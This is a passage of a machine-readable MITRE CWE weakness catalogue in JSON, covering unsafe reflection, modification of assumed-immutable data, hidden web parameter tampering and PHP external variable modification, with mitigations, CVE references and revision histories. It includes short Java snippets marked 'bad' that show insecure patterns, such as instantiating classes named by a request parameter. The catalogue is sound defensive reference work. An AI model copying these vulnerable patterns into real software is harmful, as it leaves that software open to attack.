Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Pointer Subtraction","attr":{"@_Date":"2008-04-11"}}}},"470":{"attr":{"@_ID":"470","@_Name":"Use of Externally-Controlled Input to Select Classes or Code (\'Unsafe Reflection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.","Extended_Description":"If the application uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the application to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the application\'s classpath (CWE-427) or add new entries to the application\'s classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Reflection Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"],"Note":"The attacker might be able to execute code that is not directly accessible to the attacker. Alternately, the attacker could call unexpected code in the wrong place or the wrong time, possibly modifying critical system state."},{"Scope":["Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"The attacker might be able to use reflection to call the wrong code, possibly with unexpected arguments that violate the API (CWE-227). This could cause the application to exit or hang."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"By causing the wrong code to be invoked, the attacker might be able to trigger a runtime error that leaks sensitive information in the error message, such as CWE-536."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your code to avoid using reflection."},{"Phase":"Architecture and Design","Description":"Do not use user-controlled inputs to select and load classes or code."},{"Phase":"Implementation","Description":"Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection:","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Worker ao = null;if (ctl.equals(\\"Add\\")) {}else if (ctl.equals(\\"Modify\\")) {}else {}ao.doAction(request);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ao = new AddCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ao = new ModifyCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw new UnknownActionError();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.checkAccessControl(request);ao.doAction(request);","xhtml:br":["","","",""]}}],"Body_Text":["A programmer might refactor this code to use reflection as follows:","The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher\'s access control code. If they do not modify the access control code, then some Worker classes will not have any access control.","One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows:","Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker\'s favor, the damage will already have been done. Although this scenario is relatively benign in simple applications, in larger applications where complexity grows exponentially it is not unreasonable that an attacker could find a constructor to leverage as part of an attack."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2331","Description":"Database system allows attackers to bypass sandbox restrictions by using the Reflection APi.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2331"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe Reflection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not use reflection to increase accessibility of classes, methods, or fields"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe Reflection","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Externally-Controlled Input to Select Classes or Code (aka \'Unsafe Reflection\')","attr":{"@_Date":"2009-05-27"}}]}},"471":{"attr":{"@_ID":"471","@_Name":"Modification of Assumed-Immutable Data (MAID)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly protect an assumed-immutable element from being modified by an attacker.","Extended_Description":"This occurs when a particular input is critical enough to the functioning of the application that it should not be modifiable at all, but it is. Certain resources are often assumed to be immutable when they are not, such as hidden form fields in web applications, cookies, and reverse DNS lookups.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Common data types that are attacked are environment variables, web application parameters, and HTTP headers."},{"Scope":"Integrity","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the code excerpt below, an array returned by a Java method is modified despite the fact that arrays are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String[] colors = car.getAllPossibleColors();colors[0] = \\"Red\\";","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1757","Description":"Relies on $PHP_SELF variable for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1757"},{"Reference":"CVE-2005-1905","Description":"Gain privileges by modifying assumed-immutable code addresses that are accessed by a driver.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1905"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Modification of Assumed-Immutable Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"Notes":{"Note":[{"#text":"MAID issues can be primary to many other weaknesses, and they are a major factor in languages that provide easy access to internal program constructs, such as PHP\'s register_globals and similar features. However, MAID issues can also be resultant from weaknesses that modify internal state; for example, a program might validate some data and store it in memory, but a buffer overflow could overwrite that validated data, leading to a change in program logic.","attr":{"@_Type":"Relationship"}},{"#text":"There are many examples where the MUTABILITY property is a major factor in a vulnerability.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationship_Notes, Theoretical_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"472":{"attr":{"@_ID":"472","@_Name":"External Control of Assumed-Immutable Web Parameter","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.","Extended_Description":{"xhtml:p":["If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input.","For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Assumed-Immutable Parameter Tampering"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Without appropriate protection mechanisms, the client can easily tamper with cookies and similar web data. Reliance on the cookies without detailed validation can lead to problems such as SQL injection. If you use cookie values for security related decisions on the server side, manipulating the cookies might lead to violations of security policies such as authentication bypassing, user impersonation and privilege escalation. In addition, storing sensitive data in the cookie without appropriate protection can also lead to disclosure of sensitive user data, especially data stored in persistent cookies."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String accountID = request.getParameter(\\"accountID\\");User user = getUserFromID(Long.parseLong(accountID));","xhtml:br":""}}},{"Intro_Text":"Hidden fields should not be trusted as secure parameters.","Body_Text":["An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring:","or even just \\"hidden\\". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"<input type=\\"hidden\\""}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0108","Description":"Forum product allows spoofed messages of other users via hidden form fields for name and e-mail address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0108"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2000-0254","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0254"},{"Reference":"CVE-2000-0926","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0926"},{"Reference":"CVE-2000-0101","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0101"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0758","Description":"Allows admin access by modifying value of form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758"},{"Reference":"CVE-2002-1880","Description":"Read messages by modifying message ID parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1880"},{"Reference":"CVE-2000-1234","Description":"Send email to arbitrary users by modifying email parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1234"},{"Reference":"CVE-2005-1652","Description":"Authentication bypass by setting a parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1652"},{"Reference":"CVE-2005-1784","Description":"Product does not check authorization for configuration change admin script, leading to password theft via modified e-mail address field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1784"},{"Reference":"CVE-2005-2314","Description":"Logic error leads to password disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2314"},{"Reference":"CVE-2005-1682","Description":"Modification of message number parameter allows attackers to read other people\'s messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1682"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Web Parameter Tampering"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form Fields." Page 75"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "Embedding State in HTML and URLs", Page 1032"}}]},"Notes":{"Note":[{"#text":"This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion.","attr":{"@_Type":"Relationship"}},{"#text":"This is a technology-specific MAID problem.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Web Parameter Tampering","attr":{"@_Date":"2008-04-11"}}}},"473":{"attr":{"@_ID":"473","@_Name":"PHP External Variable Modification","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Requirements","Implementation"],"Description":"Carefully identify which variables can be controlled or influenced by an external user, and consider adopting a naming convention to emphasize when externally modifiable variables are being used. An application should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Do not allow your application to run with register_globals enabled. If you implement a register_globals emulator, be extremely careful of variable extraction, dynamic evaluation, and similar issues, since weaknesses in your emulation could allow external variable modification to take place even without register_globals."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0860","Description":"File upload allows arbitrary file read by setting hidden form variables to match internal variable names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0860"},{"Reference":"CVE-2001-0854","Description":"Mistakenly trusts $PHP_SELF variable to determine if include script was called by its parent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0854"},{"Reference":"CVE-2002-0764","Description":"PHP remote file inclusion by modified assumed-immutable variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0764"},{"Reference":"CVE-2001-1025","Description":"Modify key variable when calling scripts that don\'t load a library that initializes it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1025"},{"Reference":"CVE-2003-0754","Description":"Authentication bypass by modifying array used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0754"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP External Variable Modification"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"77"}}},"Notes":{"Note":{"#text":"This is a language-specific instance of Modification of Assumed-Immutable Data (MAID). This can be resultant from direct request (alternate path) issues. It can be primary to weaknesses such as PHP file inclusion, SQL injection, XSS, authentication bypass, and others.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"474":{"attr":{"@_ID":"474","@_Name":"Use of Function with 